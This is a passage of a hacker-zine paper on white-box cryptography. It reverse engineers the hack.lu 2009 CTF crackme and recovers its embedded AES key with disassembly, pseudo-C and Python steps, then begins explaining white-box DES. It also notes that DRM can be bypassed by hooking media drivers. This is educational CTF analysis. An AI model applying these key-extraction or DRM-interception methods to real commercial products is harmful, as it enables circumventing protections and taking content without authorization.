+    3.2 - Academic state of the art
+
+  4 - Handling the first case: hack.lu's challenge
+    4.1 - The discovery step
+    4.2 - The key recovery
+    4.3 - Random thoughts
+
+  5 - White-boxing the DES
+    5.1 - The DES algorithm
+    5.2 - An overview of DES WB primitives
+
+  6 - Breaking the second case: Wyseur's challenge
+    6.1 - Efficient reverse engineering of the binary
+    6.2 - The discovery step
+    6.3 - Recovering the first subkey
+    6.4 - Recovering the original key
+
+  7 - Conclusion
+
+  8 - Gr33tz
+
+  9 - References
+
+ 10 - Appendix: Source code
+
+                                  -------
+
+
+--[ 1 - Introduction
+
+
+    This paper is about WB (white-box) cryptography. You may not have heard
+too much about it but if you're focused on reverse engineering and more
+precisely on software protections, then it may be of interest for you.
+
+    Usually The common way to learn something valuable in cryptography is
+either to read academic papers or cryptography books (when they're written
+by true cryptographers). However as cryptography is about maths, it can
+sometimes seem too theoretical for the average reverser/hacker. I'm willing
+to take a much more practical approach using a combination of both reverse
+engineering and elementary maths.
+
+    Obviously such a paper is not written for cryptographers but rather for
+hackers or crackers unfamiliar with the concept of white-box and willing to
+learn about it. Considering the quasi non existence of public
+implementations to play with as well as the 'relatively' small amount of
+valuable information on this subject, I hope this will be of interest. Or
+at the very least that it will be a pleasant read... O:-)
+
+
+--[ 2 - What is a WB implementation?
+
+
+    So let's begin with a short explanation. A white-box is a particular
+implementation of a cryptographic primitive designed to resist to the
+examination of its internals. Consider the case of a binary embedding (and
+using) a symmetric primitive (such as AES for example). With the common
+implementations, the AES key will always leak in memory at some point of
+the execution of the program. This is the classic case of a reverser using
+a debugger. No matter how hard it may be (anti-debug tricks, obfuscation of
+the key, etc.), he will always find a way to intercept the key. White-box
+cryptography techniques were designed to solve this problematic which is
+very common, especially in the field of DRM (Digital Rights Management).
+
+    So how does it work? The main concept that you should remember is that
+the key is never explicit. Or you could say that it's mathematically
+transformed or 'fused' with the encryption routine. So for one key there is
+one particular obfuscated primitive which is strictly equivalent to the
+original one*. For a same input, both implementations will produce an
+identical output. The mathematical transformation is designed in such a way
+that an attacker with a debugger will not be able to deduce the key from
+the internal state ... at least in a perfect world :-)
+
+*: It's not 'exactly' true as we will see later with external encodings.
+
+    Confused? Then take a look at this tiny example:
+
+      -> Function1: for x in [0:3] f(x) = (k+x) % 4
+      -> Function2: for x in [0:3] g(x) = S[x] with S = [3,0,1,2]
+
+    If k==3, then the two functions f() and g() are equivalent. However the
+first one explicitly uses the key 'k' whereas the second one doesn't, being
+implemented as a lookup table (LUT). You could say that g() is a white-box
+implementation of f() (albeit a very weak one) for the key 3. While this
+example is easy to understand, you will soon discover that things are more
+complicated with the obfuscation of a whole real life crypto primitive.
+
+
+--[ 3 - The things you should know about white-boxes
+
+
+             <<<<<<<<<<<<<<<<<< DISCLAIMER <<<<<<<<<<<<<<<<<<
+             > I will voluntarily not enter into too much   <
+             > details. As I said, the paper is based on a  <
+             > practical approach so let's avoid the maths  <
+             > for the moment.                              <
+             >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
+
+
+----[ 3.1 Products available
+
+
+    WB cryptography is essentially implemented in commercial security
+products by a relatively small number of companies (Cloakware -acquired by
+Irdeto-, Whitecryption, Arxan, Syncrosoft, etc.). Usually they provide a
+secure API which is then integrated into other security primitives, often
+for DRM purposes. Amongst other things, they design WB primitives for
+symmetric encryption (DES, AES) but also MAC (HMAC, CMAC) and asymmetric
+primitives (ECC, RSA, DSA).
+
+    How often do we come across WB in the wild? More than you could think
+of! For example you can see in [R10] that Irdeto has many famous customers
+including TI, Sony, Adobe and NetFLIX. WB cryptography will most likely
+become more and more present in software protections.
+
+    As far as I can tell, there are unfortunately only 2 public (non
+commercial) examples of WB implementations, both with undisclosed
+generators:
+
+    - The first historical one is a binary available on Brecht Wyseur's
+      website [R04] and is a WB DES implementation. Brecht challenges
+      people to find the key:
+
+      "If you like, try to extract the secret key, using all information
+       you can find from this implementation (besides brute-force black-box
+       attacks of course)."
+
+      Keep in mind that this is a challenge, not some production code.
+
+    - The second one less likely to be known is a challenge proposed by Jb
+      for the 2009 edition of hack.lu [R02]. This one is a simplistic AES
+      WB but was never labeled officially as such. Part of the challenge is
+      indeed to find out (oops!).
+
+    The cryptanalysis involved is obviously far below the academic state of
+the art but it's nonetheless an interesting one and a first step for who
+wants to be serious and aims at defeating more robust implementations.
+
+    We'll study both starting with Jb's binary and see how the solution can
+be found in each case.
+
+                           ,---.
+                        ,.'-.   \
+                       ( ( ,'"""""-.
+                       `,X          `.
+                       /` `           `._
+                      (            ,   ,_\
+                      |          ,---.,'o `.
+                      |         / o   \     )
+                       \ ,.    (      .____,
+                        \| \    \____,'     \
+                      '`'\  \        _,____,'
+                      \  ,--      ,-'     \
+                        ( C     ,'         \
+                         `--'  .'           |
+                           |   |         .O |
+                         __|    \        ,-'_
+                        / `L     `._  _,'  ' `.
+                       /    `--.._  `',.   _\  `
+                       `-.       /\  | `. ( ,\  \
+                      _/  `-._  /  \ |--'  (     \
+                     '  `-.   `'    \/\`.   `.    )
+                           \  -hrr-    \ `.  |    |
+
+
+----[ 3.2 Academic state of the art
+
+
+    AFAIK academic publications are limited to symmetric encryption and
+especially to DES and AES (though SPN case is somewhat extended in [R08]).
+Explaining the history of the design and the cryptanalysis techniques which
+were developed would be complicated and is already explained with great
+details in the thesis of Brecht Wyseur [R04].
+
+    The main question is to know if there exists a secure WB design and if
+you consider the current state of the art in cryptography, well... there
+isn't! There is currently no implementation proposal not broken by design.
+And in this case, broken means a key recovery in a matter of seconds in the
+worst case. Yes, _that_ broken!
+
+    However, real-life white-box cryptography may be different because:
+
+        - As explained before, proprietary implementations of algorithms
+          not mentioned in any paper (MAC algorithms, asymmetric ones)
+          exist. This proves that people were smart enough to design new
+          implementations. On the other hand, without any formal analysis
+          of these implementations, nothing can be said regarding their
+          effective security.
+
+        - Cloakware products were at least partially designed/written by
+          the cryptographers who designed the first white-box [R7]. On one
+          hand you may suspect that their product is broken by design.
+          Alternatively it can be assumed that it is at least immune
+          against current cryptanalysis techniques. Little can be said
+          about other protections (whitecryption, Arxan, Syncrosoft) but we
+          could speculate that it's not of the same caliber.
+
+    So are WB protections hard to break in practice? Who knows? But
+remember that protecting the key is one thing while protecting a content is
+something different. So if you ever audit a white-box solution, before
+trying to retrieve the key, see if you can intercept the plaintexts. There
+are lots of possible attacks, potentially bypassing the WB protections
+[R06].
+
+Remark: Obviously in the case of DRM (if no hardware protection is
+involved), you will always find a way to intercept unencrypted data. This
+is because at some point the player will have to send audio/video streams
+to the sound/video card drivers and you may want to hook some of their
+functions to recover the media. This is however a practice to forget if the
+media requires the synchronization of several streams (i.e. movies with
+both audio and video).
+
+    Now that said, let's begin with the first challenge :)
+
+
+--[ 4 - Handling the first case: hack.lu's challenge
+
+
+    I have to thank Jb for this binary as he was the one who suggested me
+to solve it a few days ago*. Unfortunately my solution is biased as I knew
+from the very beginning that it was an AES white-box. I may have taken a
+different approach to solve it if I hadn't. This is however a good enough
+example to introduce WB protections.
+
+*: Phrack being usually late "a few days ago" probably means "a few weeks**
+ago"
+**: Phrack being _indeed_ late "a few weeks ago" is now "a few months ago"
+;>
+
+
+----[ 4.1 - The discovery step
+
+
+    Since the challenge is about breaking an AES white-box, it means that
+we may need to perform several tasks:
+
+    - finding out if the WB is an AES or an AES^-1 and the associated key
+      length: 16 (AES-128), 24 (AES-192), 32 (AES-256)? We want to discover
+      exactly *what* was white-boxed.
+
+    - reversing every cryptographic functions involved and discovering how
+      they are related to the original AES functions. This is about
+      understanding *how* the implementation was white-boxed.
+
+    - finding a way to recover the original key.
+
+    I won't describe the AES as it's not necessary to understand this part.
+The necessary details will be provided a bit later. First of all, let's see
+how the serial is retrieved. We'll start by a quick reverse engineering of
+the sub_401320() function:
+
+---------------------------------------------------------------------------
+                 mov     eax, [esp+38h+hDlg]
+                 push    21h             ; cchMax
+                 lea     ecx, [esp+3Ch+String]
+                 push    ecx             ; lpString
+                 push    3ECh            ; nIDDlgItem
+                 push    eax             ; hDlg
+                 call    ds:GetDlgItemTextA
+                 cmp     eax, 20h        ; is length == 32?
+---------------------------------------------------------------------------
+
+    Without too much surprise, GetDlgItemText() is called to retrieve an
+alpha-numeric string. The comparison in the last line implies a length of
+32 bytes in its ASCII representation (not including the null byte) hence a
+16 bytes serial. Let's continue:
+
+---------------------------------------------------------------------------
+                 cmp     eax, 20h
+                 jz      short good_serial  ; if len is ok then start the
+                                            ; conversion
+
+ bad_serial:
+                 xor     eax, eax
+                 [...]
+                 retn ; return 0
+ good_serial:
+                 push    ebx
+                 push    esi
+                 xor     esi, esi  ; i=0
+                 nop
+
+ build_data_buffer:
+                 movzx   edx, [esp+esi*2+40h+String]
+                 push    edx
+                 call    sub_4012F0 ; get least significant nibble
+                 mov     ebx, eax
+                 movzx   eax, [esp+esi*2+44h+var_27]
+                 push    eax
+                 shl     bl, 4
+                 call    sub_4012F0 ; get most significant nibble
+                 or      bl, al     ; bl is now a converted byte
+                 mov     byte ptr [esp+esi+48h+input_converted], bl
+                                    ; input_converted[i] = bl
+                 inc     esi        ; i++
+                 add     esp, 8
+                 cmp     esi, 10h
+                 jl      short build_data_buffer
+
+                 lea     ecx, [esp+40h+input_converted]
+                 push    ecx
+                 mov     edx, ecx
+                 push    edx
+                 call    sub_401250 ; white-box wrapper
+                 add     esp, 8
+                 pop     esi
+                 mov     eax, 10h
+                 xor     ecx, ecx
+                 pop     ebx
+
+                 ; Compare the resulting buffer byte after byte
+
+ compare_buffers:
+                 mov     edx, [esp+ecx+38h+input_converted]
+                 cmp     edx, dword ptr ds:aHack_lu2009Ctf[ecx]
+                                     ; "hack.lu-2009-ctf"
+                 jnz     short bad_serial
+                 sub     eax, 4
+                 add     ecx, 4
+                 cmp     eax, 4
+                 jnb     short compare_buffers
+                 [...]
+                 retn
+---------------------------------------------------------------------------
+
+    The alphanumeric string is then converted byte after byte using the
+sub_4012F0() function in the corresponding plaintext (or ciphertext) block
+for cryptographic manipulations. The function sub_401250() is then called
+taking it as a parameter. When the function returns, the buffer is then
+compared to the "hack.lu-2009-ctf" string (16 bytes). If both are equal,
+the serial is valid (the function returns 1).
+
+    Let's see sub_401250() in more detail:
+
+---------------------------------------------------------------------------
+ sub_401250      proc near        ; WrapperWhiteBox
+                 [...]
+                 mov     eax, [esp+14h+arg_0]
+                 push    esi
+                 mov     esi, [esp+18h+arg_4]
+                 xor     ecx, ecx
+                 add     eax, 2
+                 lea     esp, [esp+0]
+
+ permutation1:
+                 ; First step is a transposition (special permutation)
+
+                 movzx   edx, byte ptr [eax-2]
+                 mov     [esp+ecx+18h+var_14], dl
+                 movzx   edx, byte ptr [eax-1]
+                 mov     [esp+ecx+18h+var_10], dl
+                 movzx   edx, byte ptr [eax]
+                 mov     [esp+ecx+18h+var_C], dl
+                 movzx   edx, byte ptr [eax+1]
+                 mov     [esp+ecx+18h+var_8], dl
+                 inc     ecx
+                 add     eax, 4
+                 cmp     ecx, 4
+                 jl      short permutation1
+
+                 ; Second step is calling the white-box
+
+                 lea     eax, [esp+18h+var_14]
+                 push    eax
+                 call    sub_401050  ; call WhiteBox
+                 [...]
+
+ permutation2:
+                 ; Third step is also a transposition
+                 ; Bytes' position are restored
+
+                 movzx   edx, [esp+ecx+14h+var_14]
+                 mov     [eax-2], dl
+                 movzx   edx, [esp+ecx+14h+var_10]
+                 mov     [eax-1], dl
+                 movzx   edx, [esp+ecx+14h+var_C]
+                 mov     [eax], dl
+                 movzx   edx, [esp+ecx+14h+var_8]
+                 mov     [eax+1], dl
+                 inc     ecx
+                 add     eax, 4
+                 cmp     ecx, 4
+                 jl      short permutation2
+                 [...]
+                 retn
+---------------------------------------------------------------------------
+
+    At first sight, sub_401250() is composed of three elements:
+
+        - A first bunch of instructions operating on the buffer which is
+          no more than a (4x4) matrix transposition operating on bytes.
+
+          For example:
+
+                 A B C D           A E I M
+                 E F G H  becomes  B F J N
+                 I J K L           C G K O
+                 M N O P           D H L P
+
+          This is a common step to prepare the plaintext/ciphertext block
+          into the so-called "state" as the AES is operating on 4x4 matrix.
+
+        - This function is then calling sub_401050() which is composed of
+          elementary operations such as XOR, rotations and substitutions.
+
+        - A second transposition. One important thing to know about the
+          transposition is that the function is its own inverse. The former
+          bytes' positions are thus restored.
+
+   sub_401050() is the WB. Whether it's an AES or an AES^-1 function and
+its keylength has yet to be determined. The serial acts as a plaintext or
+a ciphertext which is (de,en)crypted using a key that we want to retrieve.
+Since the output buffer is compared with an English sentence, it seems fair
+to assume that the function is an AES^-1.
+
+
+                Reverse engineering of sub_401050()
+                -----------------------------------
+
+
+    Detailing the whole reverse engineering steps is both boring and
+meaningless as it doesn't require special skills. It's indeed pretty
+straightforward. The resulting pseudo C code can be written as such:
+
+----------------------------- First version -------------------------------
+void sub_401050(char *arg0)
+{
+    int round,i;
+
+    // 9 first rounds
+    for(round=0; round<9; round++)
+    {
+      // step-1(round)
+      for(i=0; i<16; i++)
+        arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];
+
+      // step-2
+      sub_401020(arg0);
+
+      // step-3
+      for(i=0; i<4; i++)
+      {
+        char cl,dl, bl, var_1A;
+
+        cl  = byte_414000[ arg0[0+i]*4 ];
+        cl ^= byte_414400[ arg0[4+i]*4 ];
+        cl ^= byte_414800[ arg0[8+i]*4 ];
+        cl ^= byte_414C00[ arg0[12+i]*4 ];
+
+        dl  = byte_414000[ 1 + arg0[0+i]*4 ];
+        dl ^= byte_414400[ 1 + arg0[4+i]*4 ];
+        dl ^= byte_414800[ 1 + arg0[8+i]*4 ];
+        dl ^= byte_414C00[ 1 + arg0[12+i]*4 ];
+
+        bl  = byte_414000[ 2 + arg0[0+i]*4 ];
+        bl ^= byte_414400[ 2 + arg0[4+i]*4 ];
+        bl ^= byte_414800[ 2 + arg0[8+i]*4 ];
+        bl ^= byte_414C00[ 2 + arg0[12+i]*4 ];
+
+        var_1A = bl;
+
+        bl  = byte_414000[ 3 + arg0[0+i]*4 ];
+        bl ^= byte_414400[ 3 + arg0[4+i]*4 ];
+        bl ^= byte_414800[ 3 + arg0[8+i]*4 ];
+        bl ^= byte_414C00[ 3 + arg0[12+i]*4 ];
+
+        arg0[0+i] = cl;
+        arg0[4+i] = dl;
+        arg0[8+i] = var_1A;
+        arg0[12+i] = bl;
+      }
+    }
+
+    // step-4
+    for(i=0; i<16; i++)
+      arg0[i] = (char) 0x411138 [ i + arg0[i] * 16 ]
+
+    // step-5
+    sub_401020(arg0);
+    return;
+}
+----------------------------- First version -------------------------------
+
+    It seems that we have a 10 (9 + 1 special) rounds which probably means
+an AES-128 or an AES-128^-1 (hence a 16 bytes keylength as both are
+related).
+
+Remark: Something very important is that we will try to solve this problem
+using several assumptions or hypotheses. For example there is no evident
+proof that the number of rounds is 10. It _seems_ to be 10 but until the
+functions (and especially the tables) involved are not analyzed, we should
+always keep in mind that we may be wrong with the guess and that some evil
+trick could have been used to fool us.
+
+    Now we have the big picture, let's refine it a bit. For that, we will
+analyze:
+
+    - The tables at addresses 0x408138 (step-1) and 0x411138 (step-4)
+    - The round independent function sub_401020 (step-2, step-5)
+    - step-3 and the 16 arrays byte_414x0y with:
+          - x in {0,4,9,C}
+          - y in {0,1,2,3}
+
+    The tables are quite easy to analyze. A short look at them show that
+there is one substitution table per character per round. Each substitution
+seems to be a "random" bijection. Additionally, 0x408138 + 16*256*9 =
+0x411138 (which is the address of the last round's table).
+
+    The function sub_401020() is a mere wrapper of function sub_401000():
+
+---------------------------------------------------------------------------
+void sub_401020(arg0)
+{
+    int i;
+
+    for(i=0; i<4; i++)
+        sub_401000(arg0, 4*i, i);
+}
+
+// arg4 parameter is useless but who cares?
+void sub_401000(arg0, arg4, arg8)
+{
+    if(arg8 != 0)
+    {
+        (int) tmp = ((int)arg0[4*arg8] << (8*arg8)) & 0xFFFFFFFF;
+        (int) arg0[4*arg8] = tmp | ((int)arg0[4*arg8] >> (32-(8*arg8)));
+    }
+    return;
+}
+---------------------------------------------------------------------------
+
+    This is clearly the ShiftRows() elementary function of the AES.
+For example:
+
+        59 49 90 3F           59 49 90 3F   [ <<< 0 ]
+        30 A7 02 8C  becomes  A7 02 8C 30   [ <<< 1 ]
+        0F A5 07 22           07 22 0F A5   [ <<< 2 ]
+        F9 A8 07 DD           DD F9 A8 07   [ <<< 3 ]
+
+        here '<<<' is a cyclic shift
+
+    ShiftRows() is used in the encryption function while the decryption
+function uses its inverse. Unless there is a trap to fool us, this is a
+serious hint that our former assumption was wrong and that the WB is an
+AES, not an AES^-1.
+
+    Now regarding step-3 let's begin by looking at the tables. They all
+hold bijections but clearly neither random nor distinct ones. Let's look
+for example at the byte_414400 table:
+
+    byte_414400 : 0 3 6 5 C F A 9 ...
+
+    (The elements of this table are located at 0x414400, 0x414404,
+     0x41440C, etc. This is because of the *4 that you can see in the C
+     code. This rule also applied to the 15 other tables.)
+
+    If you ever studied/implemented the AES then you must know that its
+structure is algebraic. The MixColumns in particular is an operation
+multiplying each columns of the state by a particular 4x4 matrix. The
+coefficients of such mathematical objects are _not_ integers but rather
+elements of GF(2^8) whose representation is fixed by a particular binary
+polynomial.
+
+    Now if you don't have a clue about what I'm saying let's just say that
+the multiplication of said AES coefficients is not a simple integer
+multiplication. Since the calculus in itself would be highly inefficient
+most implementations use special tables holding the precomputed results.
+AES requires to know how to multiply by 01, 02, and 03 in GF(2^8). In
+particular byte_414400 is a table used to compute b = 3*a in such field (a
+is the index of the table and b is the value stored at this index).
+
+    Now let's look at the tables. In each case it was easy to see that they
+were holding a precomputed multiplication by a given coefficient:
+
+            byte_414000 : 0 2 4 6 8 A C E ...  // Coef = 2
+            byte_414400 : 0 3 6 5 C F A 9 ...  // Coef = 3
+            byte_414800 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
+            byte_414C00 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
+
+            byte_414001 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
+            byte_414401 : 0 2 4 6 8 A C E ...  // Coef = 2
+            byte_414801 : 0 3 6 5 C F A 9 ...  // Coef = 3
+            byte_414C01 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
+
+            byte_414002 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
+            byte_414402 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
+            byte_414802 : 0 2 4 6 8 A C E ...  // Coef = 2
+            byte_414C02 : 0 3 6 5 C F A 9 ...  // Coef = 3
+
+            byte_414003 : 0 3 6 5 C F A 9 ...  // Coef = 3
+            byte_414403 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
+            byte_414803 : 0 1 2 3 4 5 6 7 ...  // Coef = 1
+            byte_414C03 : 0 2 4 6 8 A C E ...  // Coef = 2
+
+    As a result, step-3 can be written as:
+
+          [ arg0(0,i)     [ 02 03 01 01      [ arg0(0,i)
+            arg0(4,i)   =   01 02 03 01   x    arg0(4,i)
+            arg0(8,i)       01 01 02 03        arg0(8,i)
+            arg0(c,i) ]     03 01 01 02 ]      arg0(c,i) ]
+
+    And this is exactly the MixColumns of the AES! Everything taken into
+account gives this new version of sub_401250():
+
+---------------------------- Second version -------------------------------
+void sub_401050(char *arg0)
+{
+    int round,i;
+
+    // 9 first rounds
+    for(round=0; round<9; round++)
+    {
+      // step-1(round)
+      for(i=0; i<16; i++)
+        arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ];
+
+      // step-2
+      ShiftRows(arg0);
+
+      // step-3
+      MixColumns(arg0);
+    }
+
+    // Last round
+
+    // step-4
+    for(i=0; i<16; i++)
+      arg0[i] = (char) 0x411138 [ i + arg0[i]*16 ];
+
+    // step-5
+    ShiftRows(arg0);
+    return;
+}
+---------------------------- Second version -------------------------------
+
+   This confirms the assumption that the WB is an AES as AES^-1 uses the
+invert function of MixColumns which makes use of a different set of
+coefficients (matrix inversion). As you can see the key material is not
+explicit in the code, somehow hidden in the tables used in step-1. Kinda
+normal for a WB ;)
+
+
+----[ 4.2 - The key recovery
+
+
+   The general algorithm (not including the key schedule which generates K)
+of AES-128 encryption is the following:
+
+---------------------------------------------------------------------------
+ROUNDS=10
+def AES_128_Encrypt(in):
+
+    out = in
+    AddRoundKey(out, K[0])
+
+    for r in xrange(ROUNDS-1):
+        SubBytes(out)
+        ShiftRows(out)
+        MixColumns(out)
+        AddRoundKey(out,K[r])
+
+    SubBytes(out)
+    ShiftRows(out)
+    AddRoundKey(out, K[10])
+    return out
+---------------------------------------------------------------------------
+
+    Where K[r] is the subkey (16 bytes) used in round r. From now on, 'o'
+is the symbol for the composition of functions, this allows us to write:
+
+        SubBytes o AddRoundKey(K[r],IN) = step-1(IN,r) for r in [0..9]
+
+    Exploiting the first round, this immediately gives a system of
+equations (with S being located at 0x408138):
+
+        SubBytes(K[0][i] ^ arg0[i]) = S[ i + arg0[i]*16 ]  for i in [0..15]
+
+    The equations hold for any arg0[i] and in particular for arg0[i] = 0.
+The resulting simplified system is thus:
+
+        SubByte(K[0][i]) = S[i]          for i in [0..15]
+        K[0][i] = SubByte()^-1 o S[i]    for i in [0..15]
+
+    Let's try it on the rub^Wpython console:
+
+---------------------------------------------------------------------------
+>>> sbox2 = inv_bij(sbox);  # We compute SubBytes^-1
+>>> S = [0xFA, 0xD8, 0x88, 0x91, 0xF1, 0x93, 0x3B, 0x39, 0xAE, 0x69, 0xFF,
+         0xCB, 0xAB, 0xCD, 0xCF, 0xF7]; # dumped @ 0x0408138
+>>> for i in xrange(16):
+...     S2[i] = sbox2[S2[i]];
+...
+>>> S2;
+[20, 45, 151, 172, 43, 34, 73, 91, 190, 228, 125, 89, 14, 128, 95, 38]
+---------------------------------------------------------------------------
+
+But remember that a transposition is necessary to retrieve the subkey!
+
+---------------------------------------------------------------------------
+>>> P = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15] #I'm lazy :)
+>>> S4 = []
+>>> for i in xrange(16):
+...     S4.insert(i,S2[P[i]])
+---------------------------------------------------------------------------
+
+    Now S4 holds the subkey K[0]. An interesting property of the AES key
+schedule is that the subkey K[0] is equal to the key before derivation.
+This is why our priority was to exploit the first round.
+
+---------------------------------------------------------------------------
+>>> s = 'hack.lu-2009-ctf'
+>>> key = ''.join(map(lambda x: chr(x), S4))
+>>> key
+'\x14+\xbe\x0e-"\xe4\x80\x97I}_\xac[Y&'
+>>> keyObj=AES.new(key)
+>>> encPwd=keyObj.decrypt(s)
+>>> encPwd.encode('hex').upper()
+'192EF9E61164BD289F773E6C9101B89C'
+---------------------------------------------------------------------------
+
+    And the solution is the same as baboon's one [R03]. Of course there
+were many other ways to proceed but it's useless to even consider them due
+to the very weak nature of this 'WB'.
+
+
+----[ 4.3 - Random thoughts
+
+
+    Jb designed this challenge so that it could be solved in the 2-days
+context of the hack.lu CTF. It's very likely that any reverser familiar
+with the AES would be able to deal with it rather easily and so did baboon
+at that time when he came up with a smart and quick solution [R03]. If Jb
+had used the implementation described in [R07] then it would have been a
+whole other game though still breakable [R05].
+
+    That being said, this implementation (which is based on what is called
+partial evaluation) may only be a toy cipher but it's perfect to introduce
+more advanced concepts. Indeed several security measures (amongst others)
+were voluntary missing:
+
+    - ShiftRows() and MixColumns() were not modified. A strong
+      implementation would have transformed them. Additionally SubBytes()
+      could have been transformed in a less gentle manner to mitigate
+      trivial attacks.
+
+    - There is a direct correspondence between an obfuscated function and
+      it's unprotected "normal" counterpart. Inputs and outputs of such
+      functions are synchronized or you could say that intermediate states
+      can be observed. "Internal encoding" removes this property.
+
+    - The first and last rounds should have a special protection. This is
+      because the input (respectively the output) of the first
+      (respectively the last) round can be synchronized with the normal
+      implementation. "External encoding" is used to prevent this but as a
+      side effect alter the compatibility with the original encryption.
+
+    - etc.
+
+Remark: If you ever come across a WB implementation, let me give you 2 nice
+tricks to see in the blink of an eye if it's potentially weak or not:
+
+    - Look at the size of the implementation. Remember that the size of an
+      obfuscated primitive is deeply related to the number and size of the
+      lookup tables, the weight of the opcodes being generally negligible.
+      In this case, the binary was 85 kB whereas the state of the art
+      requires at least 770 kB. It was thus obvious that several
+      obfuscation layers were missing.
+
+    - The fully obfuscated version of the algorithms described in [R07]
+      only uses XOR and substitutions (lookup tables) as MixColumns and
+      ShiftRows are both transformed to make it possible. One may however
+      point out that the statement holds with T-tables based
+      implementations. It's true but such implementations use well known
+      tables so it's easy to fingerprint them.
+
+    Remember that real-life white-boxes (i.e. used in DRM, embedded
+devices, etc.) are likely to be close to the state of the art (assuming
+they are designed by crypto professionals and not by the average engineer
+;)). Conversely, they may also face practical problematics (size, speed)
+which have an impact on their security. This is especially true with
+embedded devices.
+
+
+--[ 5 - White-boxing the DES
+
+
+    If you're still reading (hi there!) then it probably means that you
+already have at least a basic knowledge of cryptography. So you know that
+DES should not be used because of its short keylength (56 bits), right?
+Then why the hell should we be focused on it? Well because:
+
+    - There are only 2 public white-box design families: AES and DES
+    - If you can white-box DES, then you can probably white-box 3DES as
+      well (which is strong)
+    - I couldn't find a non commercial sophisticated enough AES WB to play
+      with and I don't want to be sued by M$, Adobe, etc. :D
+
+Remark: While AES WB cryptanalysis are essentially algebraic, DES related
+ones are statistical as you will soon find out.
+
+
+----[ 5.1 - The DES algorithm
+
+
+    DES is a so called Feistel cipher [R01] with a block size of 64 bits
+and 16 rounds (r). First a permutation (IP) is applied to the input then
+in each round a round-function is applied which splits its input in two 32
+bits buffers L (Left) and R (Right) and applies the following equations
+system:
+
+    L(r+1) = R(r)
+    R(r+1) = L(r) [+] f(R(r),K(r))
+
+    With:
+        0 <= r < 16
+        [+] being the XOR operation
+
+    The round function is described by the following scheme:
+
+--------------------------- DES round function ----------------------------
+ **********    **********
+ *  L(r)  *    *  R(r)  *
+ **********    **********
+      |            |
+    .------------- |
+    | |            v                           .---------------------.
+    | |     .-------------.                   / Linear transformation \
+    | |      \   E-Box   /                   (       32b -> 48b        )
+    | |       '---------'                     \                       /
+    | |            |                           '---------------------'
+    | |            v                                .------------.
+    | |          .....        **********           / XOR operand  \
+    | |          . + .<------ *  K(r)  *          (  2x48b -> 48b  )
+    | |          .....        **********           \              /
+    | |            /\                               '------------'
+    | |           /  \
+    | |          v    v                      .-------------------------.
+    | |   .------.    .------.              / Non linear transformation \
+    | |    \ S1 / ...  \ S8 /              (          using SBox         )
+    | |     '--'        '--'                \        8x6b -> 8x4b       /
+    | |         \      /                     '-------------------------'
+    | |          \    /
+    | |           v  v                          .---------------------.
+    | |        .--------.                      / Linear transformation \
+    | |        |  P-Box |                     (       32b -> 32b        )
+    | |        '--------'                      \                       /
+    | |            |                            '---------------------'
+    | |          ..v..                              .------------.
+    | '--------->. + .                             / XOR operand  \
+    |            .....                            (  2x32b -> 32b  )
+    |              |                               \              /
+    v              v                                '------------'
+ **********    **********
+ * L(r+1) *    * R(r+1) *
+ **********    **********
+---------------------------------------------------------------------------
+
+    When the 16 rounds are completed, the IP^-1() function is applied and
+the result is called the ciphertext.
+
+    While SBox and XOR are self explanatory, let me give you a few more
+details about the linear transformations (E-Box and P-Box).
+
+
+                                 The E-Box
+                                 ---------
+
+
+    The E-Box is used to extend a 32 bits state into a 48b one so that each
+bit can be combined with a round-key bit using a XOR. To transform 32 bits
+into 48 bits, 16 out of the 32 bits are duplicated. This is performed using
+the following table:
+
+                         32,  1,  2,  3,  4,  5,
+                          4,  5,  6,  7,  8,  9,
+                          8,  9, 10, 11, 12, 13,
+                         12, 13, 14, 15, 16, 17,
+                         16, 17, 18, 19, 20, 21,
+                         20, 21, 22, 23, 24, 25,
+                         24, 25, 26, 27, 28, 29,
+                         28, 29, 30, 31, 32,  1
+
+    For example, the first bit of output will the last bit of input (32)
+and the second bit of output will be the first bit of input (1). In this
+particular case the bit positions are written from 1 to 32. As you may have
+noticed, the 16 bits from columns 3 and 4 are not duplicated. They are
+called the middle bits, we will see later why they are important.
+
+
+                                 The P-Box
+                                 ---------
+
+
+    The P-Box is a bit permutation which means that every bit of input will
+have a new position in the output. Such a transformation is linear and can
+be represented by a bit matrix. When combined with a XOR operation with a
+constant, this is what we call an affine transformation (AT).
+
+
+----[ 5.2 - An overview of DES WB primitives
+
+
+    The first WB DES implementation was presented in [R09]. Explaining how
+and why DES white-box were designed is not the most simple of the task
+especially with an ASCII / 75 columns constraint ;> I'll try to focus on
+the main mechanisms so that you can get a global picture with the next
+section. At some point you may however feel lost. In that case, please read
+the excellent [R15] <3
+
+
+                           The protection of I/O
+                          ---------------------
+
+
+    The reverser is able to intercept every step of the algorithm as well
+as to examine all the memory. This gives him a huge advantage as he can
+easily trace all inputs and outputs of elementary functions of the WB.
+
+    In the case of DES, this is even easier thanks to the very nature of
+Feistel network. For example an attacker would easily locate the output of
+the P-Box in round (r) because it is combined with part of the input: L(r).
+To mitigate this, several transformations are performed:
+
+    a) All elementary operations of the white-box are performed on 96 bits
+       states. Let's try to understand why.
+
+       Initially a native DES round begins which the 64 bits state
+       L(r) || R(r). R(r) is then extended using the E-box to
+       generate a 8x6 = 48 bits buffer and at the same time, L(r) and R(r)
+       are still part of the internal state because they are still
+       contributing to the round's operations:
+
+
+                 **************    **************
+                 *    L(r)    *    *     R(r)   *
+                 **************    **************
+                       |     .------------|  32b
+                       |     |            v
+                       |     |  .-------------------.
+                   32b | 32b |  |       E-box       |
+                       |     |  '-------------------'
+                       |     |            |  48b
+                       v     v            v
+                      Mem1  Mem2         Mem3
+
+
+       At this point the internal state is composed of 32 x 2 + 48 = 112
+       bits which is the maximum required size before being shrunken to a
+       64 bits state at the end of the round: L(r+1) || R(r+1). To avoid
+       any information leak, a unique -constant size- state is used to hide
+       the position of the bits.
+
+       If you remember 5.1 paragraph, the E-Box is duplicating 16 out of
